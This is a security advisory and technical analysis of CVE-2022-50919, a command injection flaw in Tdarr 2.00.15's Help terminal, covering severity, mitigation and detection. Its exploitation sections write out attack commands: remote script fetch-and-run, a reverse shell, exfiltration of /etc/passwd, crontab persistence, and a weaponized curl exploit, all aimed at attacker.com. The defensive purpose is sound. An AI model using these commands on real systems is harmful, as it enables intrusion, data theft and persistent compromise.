CVE-2022-50919
CVE-2022-50919
Weakness (CWE)
CVSS Vector
v4.0- Attack Vector
- Network
- Attack Complexity
- Low
- Attack Requirements
- None
- Privileges Required
- None
- User Interaction
- None
- Confidentiality (Vulnerable)
- High
- Integrity (Vulnerable)
- High
- Availability (Vulnerable)
- High
- Confidentiality (Subsequent)
- None
- Integrity (Subsequent)
- None
- Availability (Subsequent)
- None
Description
Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.
Comprehensive Technical Analysis of CVE-2022-50919
CVE ID: CVE-2022-50919 CVSS Score: 9.8 (Critical) Affected Software: Tdarr 2.00.15 Vulnerability Type: Unauthenticated Remote Code Execution (RCE) via Command Injection
1. Vulnerability Assessment and Severity Evaluation
Vulnerability Overview
CVE-2022-50919 is a critical unauthenticated remote code execution (RCE) vulnerability in Tdarr 2.00.15, a media transcoding and management application. The flaw resides in the Help terminal functionality, where insufficient input sanitization allows attackers to inject and chain arbitrary shell commands.
CVSS v3.1 Vector Breakdown
| Metric | Value | Explanation |
|---|---|---|
| AV | Network (N) | Exploitable remotely over the network. |
| AC | Low (L) | No authentication required; exploitation is straightforward. |
| PR | None (N) | No privileges required. |
| UI | None (N) | No user interaction needed. |
| S | Unchanged (U) | Exploit affects the same scope as the vulnerable component. |
| C | High (H) | Complete compromise of confidentiality, integrity, and availability. |
| I | High (H) | Full system control possible. |
| A | High (H) | Denial of service or complete system takeover. |
Resulting CVSS Score: 9.8 (Critical)
Severity Justification
- Unauthenticated RCE is among the most severe vulnerabilities, as it allows attackers to execute arbitrary code without prior access.
- Low attack complexity (no authentication, no user interaction) makes exploitation trivial.
- High impact on confidentiality, integrity, and availability (CIA triad) due to potential full system compromise.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
The vulnerability stems from improper input sanitization in Tdarr’s Help terminal, which allows command chaining via shell metacharacters (e.g., ;, |, &&). Attackers can inject malicious commands that execute with the privileges of the Tdarr process.
Exploitation Steps:
- Identify Target: Locate a vulnerable Tdarr instance (version 2.00.15) exposed to the internet or an internal network.
- Craft Malicious Payload: Inject a command via the Help terminal, such as:
--help; curl http://attacker.com/malicious.py | python- This fetches and executes a Python script from an attacker-controlled server.
- Execute Payload: The injected command runs with the same privileges as the Tdarr service (often
rootor a high-privilege user). - Post-Exploitation: Attackers may:
- Deploy malware (e.g., ransomware, cryptominers).
- Establish persistence (e.g., reverse shell, backdoor).
- Exfiltrate sensitive data.
- Pivot to other systems in the network.
Proof-of-Concept (PoC) Exploit
A public PoC exists (Exploit-DB #50822), demonstrating how to exploit the vulnerability via a simple HTTP request:
GET /api/v2/help?command=--help;id HTTP/1.1
Host: vulnerable-tdarr-server
Expected Output:
uid=0(root) gid=0(root) groups=0(root)
This confirms RCE with root privileges.
3. Affected Systems and Software Versions
Vulnerable Software
- Tdarr 2.00.15 (confirmed vulnerable).
- Potential Impact: Earlier versions may also be affected if they share the same Help terminal logic (requires verification).
Deployment Scenarios at Risk
- Self-hosted Tdarr instances (common in home labs, media servers, and enterprise transcoding environments).
- Cloud-based deployments (if exposed to the internet).
- Internal networks (lateral movement risk if Tdarr is accessible).
4. Recommended Mitigation Strategies
Immediate Actions
-
Upgrade Tdarr:
- Apply the latest patch (if available) or upgrade to a non-vulnerable version.
- Monitor Tdarr’s official releases for security updates.
-
Network-Level Protections:
- Restrict Access: Use firewalls to limit access to Tdarr’s web interface (default port:
8265). - Segmentation: Isolate Tdarr in a dedicated VLAN or DMZ to limit lateral movement.
- WAF Rules: Deploy a Web Application Firewall (WAF) to block command injection patterns (e.g.,
;,|,&&).
- Restrict Access: Use firewalls to limit access to Tdarr’s web interface (default port:
-
Temporary Workarounds:
- Disable the Help Terminal: If not critical, remove or restrict access to the Help API endpoint.
- Run as Non-Root: Ensure Tdarr runs with the least privileges necessary (e.g., a dedicated
tdarruser).
Long-Term Hardening
-
Input Validation & Sanitization:
- Implement strict input validation for all API endpoints, rejecting metacharacters (
;,|,&,$, etc.). - Use allowlists for expected input formats.
- Implement strict input validation for all API endpoints, rejecting metacharacters (
-
Code Review & Security Testing:
- Conduct a static application security testing (SAST) scan to identify similar command injection flaws.
- Perform dynamic application security testing (DAST) to validate fixes.
-
Monitoring & Detection:
- Log Suspicious Activity: Monitor for unusual command execution patterns in Tdarr logs.
- Intrusion Detection: Deploy IDS/IPS rules to detect exploitation attempts (e.g.,
curl | pythonpatterns).
-
Zero Trust Architecture:
- Enforce least-privilege access for Tdarr and associated services.
- Implement multi-factor authentication (MFA) for administrative access.
5. Impact on the Cybersecurity Landscape
Exploitation Trends
- High Likelihood of Exploitation: Given the CVSS 9.8 score and public PoC, this vulnerability is highly attractive to:
- Opportunistic attackers (e.g., botnets, cryptominers).
- Advanced Persistent Threats (APTs) for initial access.
- Ransomware groups (e.g., LockBit, BlackCat) for lateral movement.
Broader Implications
-
Supply Chain Risks:
- Tdarr is often used in media processing pipelines, which may integrate with other critical systems (e.g., databases, storage).
- Compromise could lead to data exfiltration or supply chain attacks (e.g., malicious media files).
-
Home Lab & SMB Exposure:
- Many Tdarr instances are deployed in home labs or small businesses with minimal security controls.
- Attackers may target these for botnet recruitment or cryptojacking.
-
Regulatory & Compliance Risks:
- Organizations handling sensitive media (e.g., healthcare, legal) may face GDPR, HIPAA, or CCPA violations if data is exfiltrated.
-
Threat Intelligence & Hunting:
- Security teams should hunt for exploitation attempts in logs (e.g.,
curl,wget,pythoncommands in HTTP requests). - Threat feeds (e.g., AlienVault OTX, MISP) should include this CVE for prioritized patching.
- Security teams should hunt for exploitation attempts in logs (e.g.,
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerable Code Path:
- The Help terminal in Tdarr 2.00.15 directly passes user input to a shell command without sanitization.
- Example (pseudo-code):
function handleHelpRequest(req, res) { const userInput = req.query.command; exec(`tdarr --help ${userInput}`, (error, stdout, stderr) => { // UNSANITIZED INPUT res.send(stdout); }); } - Attackers can break out of the intended command using
;,|, or&&.
Exploitation Chaining
Attackers can chain multiple commands for post-exploitation:
- Reverse Shell:
--help; bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' - Data Exfiltration:
--help; curl -F "file=@/etc/passwd" http://attacker.com/upload - Persistence:
--help; echo "*/5 * * * * root curl http://attacker.com/backdoor.sh | bash" >> /etc/crontab
Detection & Forensics
-
Log Analysis:
- Check Tdarr logs (
/var/log/tdarr/) for:- Unusual command sequences (e.g.,
;,|,&&). - Outbound connections to unknown IPs (e.g.,
curl,wget).
- Unusual command sequences (e.g.,
- Example suspicious log entry:
[2026-01-14 12:00:00] INFO: Executing: tdarr --help; curl http://evil.com/malware.sh | bash
- Check Tdarr logs (
-
Network Forensics:
- Analyze HTTP request patterns to
/api/v2/helpfor:- Long or malformed
commandparameters. - Base64-encoded payloads (e.g.,
echo <base64> | base64 -d | bash).
- Long or malformed
- Analyze HTTP request patterns to
-
Endpoint Detection:
- Monitor for unexpected child processes of
tdarr(e.g.,bash,python,curl). - Use EDR/XDR solutions to detect anomalous process execution.
- Monitor for unexpected child processes of
Proof-of-Concept (PoC) Walkthrough
-
Identify Target:
nmap -p 8265 <target-ip> -sV- Confirm Tdarr is running on port
8265.
- Confirm Tdarr is running on port
-
Exploit:
curl "http://<target-ip>:8265/api/v2/help?command=--help;id"- Expected output:
uid=0(root) gid=0(root).
- Expected output:
-
Weaponized Exploit:
curl "http://<target-ip>:8265/api/v2/help?command=--help;curl http://attacker.com/shell.sh | bash"- Where
shell.shcontains a reverse shell payload.
- Where
Conclusion & Recommendations
CVE-2022-50919 represents a critical unauthenticated RCE vulnerability with severe implications for affected systems. Given the public PoC and low exploitation complexity, organizations must prioritize patching and implement compensating controls immediately.
Key Takeaways for Security Teams:
✅ Patch Immediately: Upgrade Tdarr to the latest secure version. ✅ Isolate & Monitor: Restrict network access and monitor for exploitation attempts. ✅ Hunt for IOCs: Check logs for command injection patterns and unusual outbound connections. ✅ Hardening: Apply least-privilege principles and input validation to prevent similar flaws.
Further Reading
By addressing this vulnerability proactively, organizations can mitigate the risk of compromise and strengthen their overall security posture.